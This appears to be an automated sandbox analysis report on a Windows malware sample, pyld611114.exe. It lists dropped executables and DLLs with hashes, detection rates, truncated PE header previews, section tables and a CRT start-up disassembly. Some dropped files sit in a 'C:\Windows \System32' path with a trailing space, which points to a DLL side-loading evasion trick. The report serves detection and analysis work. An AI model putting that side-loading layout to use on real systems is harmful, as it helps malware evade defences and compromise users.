                                                                                          SSDEEP:768:a4uHmXrH60qKdC5vI1iQfCIWVM9G4qW4ne+S/ly+PKAoXRZX6fbX57UWkCRPPA7f:Uca1KAVIPd4n+lbeRZIbSQPPA7f
                                                                                          MD5:2FC3530F3E05667F8240FC77F7486E7E
                                                                                          SHA1:C52CC219886F29E5076CED98D6483E28FC5CC3E0
                                                                                          SHA-256:AC75AF591C08442EA453EB92F6344E930585D912894E9323DB922BCD9EDF4CD1
                                                                                          SHA-512:EF78DE6A114885B55806323F09D8BC24609966D29A31C2A5AE6AD93D1F0D584D29418BA76CA2F235ED30AD8AE2C91F552C15487C559E0411E978D397C82F7046
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Joe Sandbox View:
                                                                                          • Filename: dYUteuvmHn.exe, Detection: malicious
                                                                                          • Filename: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe, Detection: malicious
                                                                                          • Filename: app64.exe, Detection: malicious
                                                                                          • Filename: printui.dll, Detection: malicious
                                                                                          • Filename: SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exe, Detection: malicious
                                                                                          • Filename: F.7z, Detection: malicious
                                                                                          • Filename: Ld0f3NDosJ.exe, Detection: malicious
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y..........................................................................Rich....................PE..d...0.sA.........."............................@.............................@.......E....`.......... .......................................'.......P.......@...............0..$...P$..T............................ ..............(!...............................text............................... ..`.rdata....... ......................@..@.data...x....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..$....0......................@..B........................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):55
                                                                                          Entropy (8bit):4.306461250274409
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                          Malicious:false
                                                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):0.34726597513537405
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Nlll:Nll
                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                          Malicious:false
                                                                                          Preview:@...e...........................................................
                                                                                          Process:C:\Windows \System32\printui.exe
                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):477696
                                                                                          Entropy (8bit):6.57837388441486
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:gxB2z8RCqsezXL7YiebX6u+bjq7TC78Vd29ZXph0lhSMXlBXBWnZLcN5hwcf:UIqt7M2bjqnC7m2Xph0lhSMXliZLcF
                                                                                          MD5:74CF33F8C2FCB56F749AAF411B9AE302
                                                                                          SHA1:934FC91EE0AB5D8879E26BD9A5F002EDCB474602
                                                                                          SHA-256:941CB9145ACA265C4E209EF54C14E746696F198C48CE216A0F3FCDAB23DB877E
                                                                                          SHA-512:37E36C2A9AAF2B1B6E993BCCDA77B34EFB9AAC8C2260B310BB071592A475298F7FAA2F4DAC38D3402517483F811F57F57B4B9335C41D4140968608248003C012
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<...x..x..x...E......E..j...E..~..h@..r..h@..i..h@.. ..m@..z...E..}..x.....0A..z..0AP.y..0A..y..Richx..........................PE..d...^B.f.........."....).......................@..........................................`.....................................................P............@...6...................z..8............................x..@...............p............................text...0........................... ..`.rdata..f5.......6..................@..@.data...40..........................@....pdata...6...@...8..................@..@.fptable.............:..............@....rsrc................<..............@..@.reloc...............>..............@..B........................................................................................................................................................................................
                                                                                          Process:C:\Windows \System32\printui.exe
                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):4684800
                                                                                          Entropy (8bit):6.761708409908653
                                                                                          Encrypted:false
                                                                                          SSDEEP:98304:E1+WtBcda7nzo7Vd8qQQPQ1CPwDvt3uFGCC:gXtBcda7nzo7Vd8qQQY1CPwDvt3uFGCC
                                                                                          MD5:158F0E7C4529E3867E07545C6D1174A9
                                                                                          SHA1:9FF0CCCB271F0215AD24427B7254832549565154
                                                                                          SHA-256:DCC1FA1A341597DDB1476E3B5B3952456F07870A26FC30B0C6E6312764BAA1FC
                                                                                          SHA-512:51E79D8D0AB183046F87AA659973B45147BB1E1AE8883F688C615CCB18BF9FCCB8779DD872B01748BACD56E141BC096C2BB4CCF32EBD7A49ADC76363355E40FE
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............vI..vI..vI..I..vI;DwH..vI;DsH..vI;DrH..vI;DuH..vI..wI*.vI..wH..vI..vI..vI.GrHl.vI.GvH..vI.G.I..vI.GtH..vIRich..vI........PE..d...d.Lf.........." ...'..4..........4.......................................G...........`...........................................A. ... @D.@....0G.......D.LH...........@G.L.....?.T.............................?.@.............4..............................text...8.4.......4................. ..`.rdata..*.....4.......4.............@..@.data....t...`D..J...JD.............@....pdata..LH....D..J....D.............@..@.rsrc........0G.......F.............@..@.reloc..L....@G.......F.............@..B................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows \System32\printui.exe
                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):561152
                                                                                          Entropy (8bit):6.383490918799092
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:0u3rEnX6Gtd3+XZRnRNvNu86p07GZiDnwXA3qGueVW08G:d7EnX/L3+p7NvNu8OqnwXA3qGueVWG
                                                                                          MD5:93F8F5133ED40262B9FD437915718B82
                                                                                          SHA1:A18E34F2E1ECADA88249D5B6A87F137A2A1E5041
                                                                                          SHA-256:78993F8E7AC2D139A8B7198F229D8EF1BA2000D7EB1B07FB7AA4FCCCF7786151
                                                                                          SHA-512:E1F15B6CEE766D02823938B38BB580C7EFF94E0F4CD907AC4676A65BBC4A9632B5DB0CA54D7B8E6E14042510720E063C00C538DEA3DCBD56C94C65EEADCFCB26
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1i[.u.5Pu.5Pu.5P|p.Pg.5P..4Qw.5P...P}.5P..6Qq.5P..1Q}.5P..0Qx.5Pe.4Qw.5Pu.4P..5P>p4Q~.5Pe.1Q..5Pe.5Qt.5Pe..Pt.5Pu..Pt.5Pe.7Qt.5PRichu.5P........PE..d....,Of.........." ...(.Z...<.......]....................................................`.........................................@.......H...T............`..(S..............X.......T..............................@............p...............................text...8X.......Z.................. ..`.rdata......p.......^..............@..@.data...(0... ...(..................@....pdata..(S...`...T...*..............@..@.rsrc................~..............@..@.reloc..X...........................@..B................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows \System32\printui.exe
                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):1851113
                                                                                          Entropy (8bit):6.295735352298234
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:SAlxpPnBAUZLY9OVbbTiZGavkg3NyeuQ6l9fH+f2ykqZrkgecviRd7mQFz:DPnBAUZLY9OEZGaXBuQQ9e2YYUQFz
                                                                                          MD5:158BC77453D382CF6679CE35DF740CC5
                                                                                          SHA1:9A3C123CE4B6F6592ED50D6614387D059BFB842F
                                                                                          SHA-256:CF131738F4B5FE3F42E9108E24595FC3E6573347D78E4E69EC42106C1EEBE42C
                                                                                          SHA-512:6EB1455537CB4E62E9432032372FAE9CE824A48346E00BAF38EF2F840E0ED3F55ACAEE2656DA656DB00AE0BDEF808F8DA291DD10D7453815152EDA0CCFC73147
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...8.Jd....q.....& ..."............P..........f............................................. .................................................D....@..........d............P..................................(.......................p............................text..............................`.P`.data...............................@.P..rdata..............................@.`@.pdata..d...........................@.0@.xdata..............................@.0@.bss..................................`..edata..............................@.0@.idata..D...........................@.0..CRT....X.... ......................@.@..tls.........0......................@.@..rsrc........@......................@.0..reloc.......P......................@.0B/4...... ....`......................@..B/19.....m....p... ..................@..B/31......2.......4..................@..B/45.....
                                                                                          Process:C:\Windows \System32\printui.exe
                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):475769
                                                                                          Entropy (8bit):5.442192544327632
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:YoSRYqB/kDraXbQTNRC6RsclS8DzT6Bam:+YY/kDraLQTNRCPWDzT6Bam
                                                                                          MD5:E79E7C9D547DDBEE5C8C1796BD092326
                                                                                          SHA1:8E50B296F4630F6173FC77D07EEA36433E62178A
                                                                                          SHA-256:1125AC8DC0C4F5C3ED4712E0D8AD29474099FCB55BB0E563A352CE9D03EF1D78
                                                                                          SHA-512:DBA65731B7ADA0AC90B4122C7B633CD8D9A54B92B2241170C6F09828554A0BC1B0F3EDF6289B6141D3441AB11AF90D6F8210A73F01964276D050E57FB94248E2
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......[.H........& .....D....................(h....................................0......... ......................................................@..8....................P..p........................... 0..(....................................................text...8C.......D..................`.P`.data........`.......J..............@.`..rdata..0M...p...N...L..............@.`@.pdata..............................@.0@.xdata..d...........................@.0@.bss....P.............................`..edata..............................@.0@.idata..............................@.0..CRT....X.... ......................@.@..tls....h....0......................@.`..rsrc...8....@......................@.0..reloc..p....P......................@.0B/4...........`......................@.PB/19..........p......................@..B/31.....1:.......<..................@..B/45.....
                                                                                          Process:C:\Windows \System32\printui.exe
                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):327168
                                                                                          Entropy (8bit):6.055910692008984
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:veJ/i9L1mle2NwGTQ46ZEEKN4zP2/SHzI4l/4OMx7apSPIYuh0L/iXmJ:gmV2NwQQ3G4zP22rOIy
                                                                                          MD5:EF060E5C414B7BE5875437FF2FB8EC54
                                                                                          SHA1:6DCF04DFF9B25BE556EC97660F95ACF708C0C870
                                                                                          SHA-256:E6ACED8D30471F35B37ABBF172CE357B6A8F18AF5FEB342B6CFFC01D3378F2B4
                                                                                          SHA-512:67BFF321BA901A0B0DC0F6C4A723D7DF35418F593E16E6193673CCE5190D76355409F676C1EA5D0CB46493F5735209089A3A52D3D716EB8187BF6E846792E2E8
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Windows \System32\printui.exe
                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):818176
                                                                                          Entropy (8bit):6.269258421632734
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:NGbc08emtUas2F158w1T4qLgl85MNRlqnZ5ydEVB3i:NGoL9W0lJ5cR9dEVB3
                                                                                          MD5:69D0FEE0CC47C3B255C317F08CE8D274
                                                                                          SHA1:782BC8F64B47A9DCEDC95895154DCA60346F5DD7
                                                                                          SHA-256:BA979C2DBFB35D205D9D28D97D177F33D501D954C7187330F6893BB7D0858713
                                                                                          SHA-512:4955252C7220810ED2EACA002E57D25FBC17862F4878983C4351C917CF7873EB84AE00E5651583004F15A08789BE64BDB34FF20CB0E172C9C1376706DEB4AA1A
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Windows \System32\printui.exe
                                                                                          File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):52736
                                                                                          Entropy (8bit):5.840253326728635
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:fE20UsQSmxsJ/jPxsiFFnoCImovqcyz88rtYNChvThLaim3Yu/g/D8:cis0sP5FBQ7vU9BYshtaim3Yuo78
                                                                                          MD5:9DC829C2C8962347BC9ADF891C51AC05
                                                                                          SHA1:BF9251A7165BB2981E613AC5D9051F19EDB68463
                                                                                          SHA-256:FFE2D56375BB4E8BDEE9037DF6BEFC5016DDD8871D0D85027314DD5792F8FDC9
                                                                                          SHA-512:FD7E6F50A21CB59075DFA08C5E6275FD20723B01A23C3E24FB369F2D95A379B5AC6AE9F509AA42861D9C5114BE47CCE9FF886F0A03758BFDC3A2A9C4D75FAB56
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Windows \System32\printui.exe
                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):1786880
                                                                                          Entropy (8bit):6.056894707447503
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:JUV0C8E3W4JoceLErS6P0qoc6uoPrT5PgVBHmaw+zrGOzli7Gi0m9ZRXyYk:i8/B90ozghlGJ7js
                                                                                          MD5:C3130CFB00549A5A92DA60E7F79F5FC9
                                                                                          SHA1:56C2E8FB1AF609525B0F732BB67B806BDDAB3752
                                                                                          SHA-256:EEE42EABC546E5AA760F8DF7105FCF505ABFFCB9EC4BF54398436303E407A3F8
                                                                                          SHA-512:29BAB5B441484BDFAC9EC21CD4F0F7454AF05BFD7D77F7D4662AEAEAA0D3E25439D52AA341958E7896701546B4A607D3C7A32715386C78B746DFAE8529A70748
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\Desktop\pyld611114.exe
                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):14693888
                                                                                          Entropy (8bit):6.554170789313033
                                                                                          Encrypted:false
                                                                                          SSDEEP:393216:3PsdXtBcda7nzo7Vd7Qv1CPwDvt3uFRCvfxlXnwXAaGueVW3XSdEVB3:3ITkS6
                                                                                          MD5:11DDC0A34BAC7AB099D2EE8D9817BF58
                                                                                          SHA1:C9BD99F91118FCA4E1BFDEBC36CDED5B09BE39D0
                                                                                          SHA-256:0C396F737C1DECD395926CB52CC9F3D2AD1A3EEE5290DB62197CF617F2F0E554
                                                                                          SHA-512:62A0FF1412B3E28053FE2888D088C63B21BC07BD922C6286CAAF94FABAAC9FB5CABF91668CBEEE88E71B5B48F27613CBCCA63272A2AB604FCED69DA776567E49
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                                          Process:C:\Windows \System32\printui.exe
                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):131920
                                                                                          Entropy (8bit):6.0574531251583865
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:QB6NlnzaWMj6FBknM+eHLEQE9gHAWdwfP5sd4Sohg7vMHvqZecb399R0BqZEBFP:QBYl5MOcM1HAb1wM0ecb39/0BqZEjP
                                                                                          MD5:F57FB935A9A76E151229F547C2204BBA
                                                                                          SHA1:4021B804469816C3136B40C4CEB44C8D60ED15F5
                                                                                          SHA-256:A77277AF540D411AE33D371CC6F54D7B0A1937E0C14DB7666D32C22FC5DCA9C0
                                                                                          SHA-512:CD9FC3FC460EBA6A1B9F984B794940D28705ECB738DF8595C2341ABE4347141DB14A9FF637C9F902E8742F5C48BBB61DA7D5E231CC5B2BAD2E8746C5A3E3E6ED
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Windows \System32\printui.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):384
                                                                                          Entropy (8bit):7.477213331403198
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:a1yzGK019rYhVXAsui2cxoOFO79eNtId8qXjo+4M8Oa14BwBRA20GBrVU1zHjm5O:qm4BYhVXAst2cx7OxeM5Uww4BN/77j+O
                                                                                          MD5:65BB9A3C512A51DB4AEB9FF7DB94A97E
                                                                                          SHA1:105051128FD4ED96179EDA2A1F6EB97B93582BE6
                                                                                          SHA-256:AF5F54FC6D317E6A014120F2F57B24317AA3D6AA05CA68C1D7C45E30DA87A0DB
                                                                                          SHA-512:49375C038130A41CFDEF7F96F80151210F8A9CFB0E173DC6B750CFE650BA7B916A35DCD70525B61EF67BF156967E520160A2D2467D7BA5287C20B5DADE51730A
                                                                                          Malicious:false
                                                                                          Process:C:\Windows \System32\printui.exe
                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):2256384
                                                                                          Entropy (8bit):6.5528122196655545
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:IIVkvsArhlpgxVnHkVnya+h0lhSMXlMDXg87/iXAah0lhSMXlDT/Z6Po7al9Nbtw:IMkkA1EHGnLag8TL3J6P7FGcjq
                                                                                          MD5:E4BD51C06CFF7A34FCCC4576AF852AFE
                                                                                          SHA1:D503AAFF2986C8F714D0FA457125BE566B6A9F95
                                                                                          SHA-256:FFAC21DD5AE0E22A1DC423361ECBFE5D73F2F11DB5A1F6906B03B2A0A2B6612C
                                                                                          SHA-512:5B2C69254F2EC25B2467983AE5C965F7860C4BDF8470E97594E6A0353CCC8E682B81815132FD38CE8B7F8F23FA013DA10C06C003C4B983A054651CC93A42324E
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                          Process:C:\Windows \System32\printui.exe
                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):90624
                                                                                          Entropy (8bit):6.511410074418791
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:EarCl5V5lEwda1RnSbFfbpYwayRyivl9bEKIOcIOZgyZ6rM3SIryPoIKr:EKcV5lEwUbShbpbaCpvsYSZgU6A3SIrf
                                                                                          MD5:BB78414FB31B53EF8FAD8AFBEDBB834C
                                                                                          SHA1:2CA62ED9A628E17887C0C9E5C07A2CC44B926EF8
                                                                                          SHA-256:AE8951AD96124A39B63610D7A5A53B446FC7F19151AC1D8E5AC15E8C88227EBF
                                                                                          SHA-512:9244CDF4EB86AE4071A74D584D170AC3D8F414F13EF3E9E8988C49B3488DC6FA1BB4DBB771635F145AE06484421C1101D120F63D34F3C479CD5F1FF9AAA646AF
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
Note: the report lists nine further dropped files identical to the entry above (same 60-byte size, same hashes, same content). PowerShell itself writes these probe files at start-up to test whether AppLocker/WDAC script enforcement applies to it; their content is PowerShell's own and not attacker-written, so these entries only record that PowerShell was started by the sample, not what its scripts contained.
                                                                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                          Entropy (8bit):6.5564607842905644
                                                                                          TrID:
                                                                                          • Win64 Executable GUI (202006/5) 92.65%
                                                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                          • DOS Executable Generic (2002/1) 0.92%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:pyld611114.exe
                                                                                          File size:15'180'800 bytes
                                                                                          MD5:43bce45d873189f9ae2767d89a1c46e0
                                                                                          SHA1:34bc871a24e54a83740e0df51320b9836d8b820b
                                                                                          SHA256:9ae4784f0b139619ca8fdadfa31b53b1cbf7cd2b45f74b7e4004e5a97e842291
                                                                                          SHA512:f3424b65c72e242e77e5129903b4dc42fb94076402d24c9f2cea07ff117761942ecedec43e0ad6e39ef61628ed0c4709be7706e3c20537d476edb57df2521380
                                                                                          SSDEEP:393216:4PsdXtBcda7nzo7Vd7Qv1CPwDvt3uFRCvfxlXnwXAaGueVW3XSdEVB3:4ITkS6
                                                                                          TLSH:9EE69E5AB7B900A9E477C278C5975217F772B811037097DB1BA4A6B91F33BD0AE3A700
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........l...?...?...?.,.>`..?.,.>...?.,.>...?.).>...?.).>...?.).>...?.,.>...?...?V..?.(.>...?.(z?...?.(.>...?Rich...?........PE..d..
                                                                                          Icon Hash:00928e8e8686b000
                                                                                          Entrypoint:0x1400235d0
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x140000000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x66C34368 [Mon Aug 19 13:06:48 2024 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:6
                                                                                          OS Version Minor:0
                                                                                          File Version Major:6
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:6
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:7f0e1170ffadddb37aa500dea54d9334
Instruction (x64 decode of the entrypoint bytes; the original listing decoded the same bytes as 32-bit code, which rendered the REX prefixes as separate dec/inc instructions and movsxd as arpl. The call/jmp targets are reproduced as the sandbox printed them; they lie outside the 0x140000000 image base and are not image addresses.)
sub rsp, 28h
call 00007F25E881D8BCh
add rsp, 28h
jmp 00007F25E881CE1Fh
int3
int3
sub rsp, 28h
mov r8, qword ptr [r9+38h]
mov rcx, rdx
mov rdx, r9
call 00007F25E881CFB2h
mov eax, 00000001h
add rsp, 28h
ret
int3
int3
int3
push rbx
mov r11d, dword ptr [r8]
mov rbx, rdx
and r11d, FFFFFFF8h
mov r9, rcx
test byte ptr [r8], 00000004h
mov r10, rcx
je 00007F25E881CFB5h
mov eax, dword ptr [r8+08h]
movsxd r10, dword ptr [r8+04h]
neg eax
add r10, rcx
movsxd rcx, eax
and r10, rcx
movsxd rax, r11d
mov rdx, qword ptr [rax+r10]
mov rax, qword ptr [rbx+10h]
mov ecx, dword ptr [rax+08h]
mov rax, qword ptr [rbx+08h]
test byte ptr [rcx+rax+03h], 0000000Fh
je 00007F25E881CFADh
movzx eax, byte ptr [rcx+rax+03h]
and eax, FFFFFFF0h
add r9, rax
xor r9, rdx
mov rcx, r9
pop rbx
jmp 00007F25E881CC26h
int3
mov qword ptr [rsp+10h], rbx
mov qword ptr [rsp+18h], rsi
push rbp
push rdi
push r14
mov rbp, rsp
sub rsp, 10h
xor eax, eax
xor ecx, ecx
cpuid
mov r8d, ecx
mov r10d, edx
xor r10d, 49656E69h
xor r8d, 6C65746Eh
mov r9d, ebx
mov r14d, eax
xor ecx, ecx
Note: this is standard MSVC x64 CRT start-up code rather than sample-specific logic. The first routine initialises the /GS security cookie and tail-jumps into the CRT main routine; the next two are __GSHandlerCheck and __GSHandlerCheckCommon, the exception handlers that validate the cookie during unwinding; the last is the beginning of __isa_available_init, whose cpuid leaf 0 vendor test xors edx and ecx against 49656E69h ("ineI") and 6C65746Eh ("ntel") to recognise a GenuineIntel CPU. A cpuid in this code is CRT initialisation, so the "query CPU information (cpuid)" signature is not by itself evidence of sandbox detection; the anti-analysis checks listed under the behavioural signatures have to be located elsewhere in the binary.
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xe74364         0x3c          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xe7d000         0x1e8         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0xe78000         0x37ec        .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xe7e000         0xa94         .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0xe6d010         0x38          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xe6ced0         0x140         .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x3e000          0x360         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name      Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type                             Entropy             Characteristics
.text     0x1000           0x3cf94       0x3d000   993d88a8d40ba69c46d0f609b5a111a8  False     0.5172459336577869   data                                  6.466922004661196   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
